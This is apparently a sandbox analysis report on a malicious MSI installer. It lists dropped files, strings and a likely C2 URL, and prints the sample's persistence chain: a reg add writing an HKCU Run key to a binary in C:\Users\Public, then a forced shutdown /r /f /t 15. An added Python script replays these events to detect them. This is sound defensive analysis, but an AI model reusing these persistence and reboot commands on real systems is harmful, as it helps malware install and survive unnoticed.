Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://tl.symcd.com0&
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: vJrY.png.3.dr | String found in binary or memory: http://www.mcafee.com
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://acons2020temix54.lisf
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://acons2020temix54.lisf/
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | String found in binary or memory: https://collect.installeranalytics.com
Source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | String found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: https://www.advancedinstaller.com
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 9rybs.msi, 495fa1.msi.2.dr | String found in binary or memory: https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html
Source: vJrY.png.3.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49707 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Process Stats: CPU usage > 49%
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_003F0140 GetClientRect,IsWindow,ShowWindow,DestroyWindow,PostQuitMessage,NtdllDefWindowProc_W,GetClientRect,NtdllDefWindowProc_W,GetClientRect,IsWindow,BringWindowToTop,__Mtx_unlock,SetWindowTextW,__Mtx_unlock,IsWindow,SetForegroundWindow,__Mtx_unlock,__Mtx_unlock,IsWindow,ShowWindow,UpdateWindow,IsWindow,ShowWindow,UpdateWindow,GetWindowRect,MoveWindow,Sleep,GetWindowRect,MoveWindow,Sleep,__Mtx_unlock
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_003FD2A0 NtQueryVirtualMemory,NtCreateFile,NtCreateFile
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_003FF4F0 GetCurrentProcess,GetModuleHandleW,NtCreateFile
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00406090 NtClose,NtClose
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0040A190 NtQueryInformationThread,NtQueryInformationThread,NtQueryInformationThread
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00405480 NtCreateFile,NtCreateFile
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00402520 Concurrency::cancel_current_task,NtQueryDirectoryFile,NtQueryDirectoryFile
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00405AD0 NtQueryFullAttributesFile,NtQueryFullAttributesFile
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0040CB80 NtQuerySystemInformation,NtQuerySystemInformation,SysAllocStringLen,GetCurrentProcessId,GetLastError,NtQueryInformationProcess,NtQueryInformationProcess,CloseHandle
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00405F60: DeviceIoControl,GetLastError
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\495fa1.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6185.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI62DE.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI635C.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6467.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6487.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F17.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F47.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7003.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7033.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{15AABDA9-5457-45E2-8C08-D78BBF9DF5D5}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI70A2.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI9F25.tmp
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI6185.tmp
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code functions: 12_2_0041C012, 12_2_0043901B, 12_2_00418150, 12_2_004351C8, 12_2_004191B0, 12_2_0040B360, 12_2_0043044A, 12_2_004135B0, 12_2_0042C75F, 12_2_003EA720, 12_2_0041A700, 12_2_00408870, 12_2_0042CAED, 12_2_0040BAF0, 12_2_0040CB80, 12_2_00403B80, 12_2_00402C60, 12_2_00434D40, 12_2_00419D00, 12_2_025B4ED8, 12_2_025B4EC9, 12_2_06302E91, 12_2_063026D0, 12_2_06307D78, 12_2_06300314, 12_2_06301430, 12_2_063005A8, 12_2_06303211, 12_2_06321DD8, 12_2_06325D0F, 12_2_06325D6D, 12_2_06325D89
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: String function: 003FB3E0 appears 35 times
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: String function: 00400320 appears 46 times
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: String function: 00426800 appears 39 times
Source: 9rybs.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs 9rybs.msi
Source: 9rybs.msi | Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs 9rybs.msi
Source: 9rybs.msi | Binary or memory string: OriginalFilenameInstallerAnalytics.dllF vs 9rybs.msi
Source: 9rybs.msi | Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs 9rybs.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: shi64B2.tmp.3.dr | Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: 9rybs.msi, 495fa1.msi.2.dr | Binary or memory string: .VBP2
Source: classification engine | Classification label: mal64.rans.evad.winMSI@15/33@3/3
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\AdvinstAnalytics
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Mutant created: \Sessions\1\BaseNamedObjects\DM0Ab6K//fQJogkamn3nDv0Hk7oulb5M1UDzxef1Ua8YhFSRu4d0RJHhGDKUPKZ8
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\{46C61DD2-00A3-46F1-B456-3E6CDCEF89B7}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFBAD3E09A4BB3EFCB.TMP
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Windows\SysWOW64\msiexec.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Windows\SysWOW64\shutdown.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: unknown | Process created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
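The process creations above are the whole persistence chain: the 32-bit msiexec.exe running the MSI custom action spawns cmd.exe to write an HKCU Run value that points at C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe, then spawns shutdown.exe /r /f /t 15. The forced reboot means the Run value, not the installer, is what launches the dropped binary; the two PeFIvJrY.exe starts above have no recorded parent, which is consistent with that. The script below is an added example, not part of the Joe Sandbox report or of the sample: it replays that tree from constructed events and emits the three verdicts the Sigma rules in the signature list produce (Run key into a suspicious folder, execution from a suspicious folder, shutdown.exe spawned by the installer). The event field names and the folder list are assumptions chosen for the example, not the Sigma rules' own definitions.

```python
"""Added example: replay the installer's process tree and raise the three verdicts
the report's Sigma rules produce. Event shape and folder list are assumptions."""
import re

# Folders a legitimate product rarely auto-starts from. An approximation chosen for
# this example; the Sigma rules keep their own, longer lists.
SUSPICIOUS_FOLDERS = (
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "c:\\windows\\temp\\",
    "c:\\perflogs\\",
    "c:\\temp\\",
)
RUN_KEY_SUFFIXES = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line into arguments, dropping the quotes around "..." tokens."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def norm_path(path):
    return path.strip().lower().replace("/", "\\")


def basename(path):
    return norm_path(path).rsplit("\\", 1)[-1]


def in_suspicious_folder(path):
    p = norm_path(path)
    return any(folder in p for folder in SUSPICIOUS_FOLDERS)


def parse_reg_add(tokens):
    """Find `reg add KEY [/v NAME] [/t TYPE] [/d DATA]` anywhere in the argument list
    (it may be wrapped in `cmd.exe /C start /MIN ...`) and return its parts, else None."""
    low = [t.lower() for t in tokens]
    for i in range(len(low) - 2):
        if basename(low[i]) in ("reg", "reg.exe") and low[i + 1] == "add":
            opts, j = {}, i + 3
            while j + 1 < len(tokens):
                if low[j] in ("/v", "/t", "/d"):
                    opts[low[j]] = tokens[j + 1]
                    j += 1
                j += 1
            return {"key": tokens[i + 2], "value": opts.get("/v"),
                    "type": opts.get("/t"), "data": opts.get("/d")}
    return None


def parse_shutdown(tokens):
    """Return (reboot, force, delay_seconds) for a shutdown.exe command line, else None."""
    if not tokens or basename(tokens[0]) != "shutdown.exe":
        return None
    low = [t.lower() for t in tokens[1:]]
    delay = 30  # shutdown.exe's documented default when /t is omitted
    if "/t" in low and low.index("/t") + 1 < len(low):
        delay = int(low[low.index("/t") + 1])
    return ("/r" in low, "/f" in low, delay)


def triage(events):
    """events: dicts with parent, image, cmdline. Returns (rule, image, detail) tuples."""
    findings = []
    for ev in events:
        image, tokens = ev["image"], tokenize(ev["cmdline"])
        if in_suspicious_folder(image):
            findings.append(("execution_from_suspicious_folder", image, image))
        reg = parse_reg_add(tokens)
        if reg and norm_path(reg["key"]).rstrip("\\").endswith(RUN_KEY_SUFFIXES) \
                and reg["data"] and in_suspicious_folder(reg["data"]):
            findings.append(("run_key_to_suspicious_folder", image,
                             "%s = %s" % (reg["value"], reg["data"])))
        sd = parse_shutdown(tokens)
        if sd:
            reboot, force, delay = sd
            findings.append(("shutdown_spawned", image,
                             "parent=%s reboot=%s force=%s delay=%ds"
                             % (basename(ev["parent"] or "?"), reboot, force, delay)))
    return findings


# Constructed from the process tree in the report above; not captured telemetry.
EVENTS = [
    {"parent": "", "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": '"C:\\Windows\\System32\\msiexec.exe" /i "C:\\Users\\user\\Desktop\\9rybs.msi"'},
    {"parent": "C:\\Windows\\System32\\msiexec.exe", "image": "C:\\Windows\\SysWOW64\\msiexec.exe",
     "cmdline": "C:\\Windows\\syswow64\\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD"},
    {"parent": "C:\\Windows\\SysWOW64\\msiexec.exe", "image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\cmd.exe" /C start /MIN reg add '
                'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v PeFIvJrY /t reg_sz '
                '/d "C:\\Users\\Public\\PeFI\\vJrY\\PeFIvJrY.exe"'},
    {"parent": "C:\\Windows\\SysWOW64\\cmd.exe", "image": "C:\\Windows\\SysWOW64\\reg.exe",
     "cmdline": 'reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v PeFIvJrY '
                '/t reg_sz /d "C:\\Users\\Public\\PeFI\\vJrY\\PeFIvJrY.exe"'},
    {"parent": "C:\\Windows\\SysWOW64\\msiexec.exe", "image": "C:\\Windows\\SysWOW64\\shutdown.exe",
     "cmdline": '"C:\\Windows\\SysWOW64\\shutdown.exe" /r /f /t 15'},
    {"parent": "", "image": "C:\\Users\\Public\\PeFI\\vJrY\\PeFIvJrY.exe",
     "cmdline": '"C:\\Users\\Public\\PeFI\\vJrY\\PeFIvJrY.exe"'},
]

if __name__ == "__main__":
    for rule, image, detail in triage(EVENTS):
        print("%-34s %-45s %s" % (rule, image, detail))
```

Running it yields four findings: the Run-key verdict fires twice, once on the cmd.exe wrapper and once on the reg.exe child, because both command lines carry the full reg add; the shutdown finding records msiexec.exe as the parent, which is the detail worth alerting on since a forced reboot fifteen seconds after an install is not what a product installer normally does.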
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, msi.dll, srpapi.dll, kernel.appcore.dll, kernel.appcore.dll, tsappcmp.dll, uxtheme.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, textshaping.dll, netapi32.dll, wkscli.dll, netutils.dll, version.dll, mscoree.dll, profapi.dll, sspicli.dll, pcacli.dll, mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, tsappcmp.dll, userenv.dll, profapi.dll, sspicli.dll, netapi32.dll, wkscli.dll, netutils.dll, wldp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, pcacli.dll, mpr.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, iphlpapi.dll, dbghelp.dll, wininet.dll, dhcpcsvc.dll, windows.storage.dll, wldp.dll, iertutil.dll, netapi32.dll, samcli.dll, netutils.dll, logoncli.dll, netapi32.dll, samcli.dll, netutils.dll, logoncli.dll, uxtheme.dll, profapi.dll, netapi32.dll, samcli.dll, netutils.dll, logoncli.dll, netapi32.dll, version.dll, secur32.dll, samcli.dll, netutils.dll, sspicli.dll, ntmarta.dll, propsys.dll, mscoree.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, userenv.dll, netprofm.dll, npmproxy.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, samlib.dll, logoncli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dbghelp.dll, wininet.dll, iertutil.dll, dbghelp.dll, wininet.dll, iertutil.dll, netapi32.dll, samcli.dll, netutils.dll, logoncli.dll, dbghelp.dll, wininet.dll, iertutil.dll, jscript.dll, iertutil.dll, scrrun.dll, sxs.dll, msasn1.dll, gpapi.dll, winhttpcom.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, winnsi.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, cryptsp.dll, msdart.dll, dpapi.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, dbghelp.dll, wininet.dll, ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: shutdownext.dll, sspicli.dll
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Section loaded: webview2loader.dll, mscoree.dll, kernel.appcore.dll, version.dll, uxtheme.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Section loaded: webview2loader.dll, mscoree.dll, kernel.appcore.dll, version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File written: C:\Users\user\AppData\Local\AdvinstAnalytics\66ac0c9e2ff508bfba878aa5\8.7.6.8\tracking.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 9rybs.msi | Static file information: File size 12885696 > 1048576
Source: Binary string: wininet.pdb source: shi64B2.tmp.3.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdb source: PeFIvJrY.exe, PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 9rybs.msi, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: d3d12.pdbUGP source: shi6530.tmp.3.dr
Source: Binary string: d3d12.pdb source: shi6530.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 9rybs.msi, MSI6487.tmp.2.dr, 495fa1.msi.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\build\Win32\Release\mc-webview-cnt.pdbJ source: PeFIvJrY.exe, 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, PeFIvJrY.exe, 0000000D.00000002.1727643919.00000000003E1000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: wininet.pdbUGP source: shi64B2.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: 9rybs.msi, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr
Source: shi6530.tmp.3.dr | Static PE information: 0x96D7AA59 [Sat Mar 12 16:44:09 2050 UTC]
Source: shi64B2.tmp.3.dr | Static PE information: section name: .wpp_sf
Source: shi64B2.tmp.3.dr | Static PE information: section name: .didat
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_004441FD push esi; ret 12_2_00444206
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00426443 push ecx; ret 12_2_00426456
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_063237CA push eax; iretd 12_2_063237CD
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_06321205 push edx; retf 12_2_06321206
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_063212BA push edx; retf 12_2_063212BB
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_06321101 push ebx; retf 12_2_06321102
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7003.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F47.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7033.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI62DE.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\PeFI.png
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll.png (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI9F25.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY.png
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6185.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\shi6530.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\shi64B2.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI635C.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6F17.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\Public\PeFI\vJrY\vJrY.png (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6467.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6487.tmp
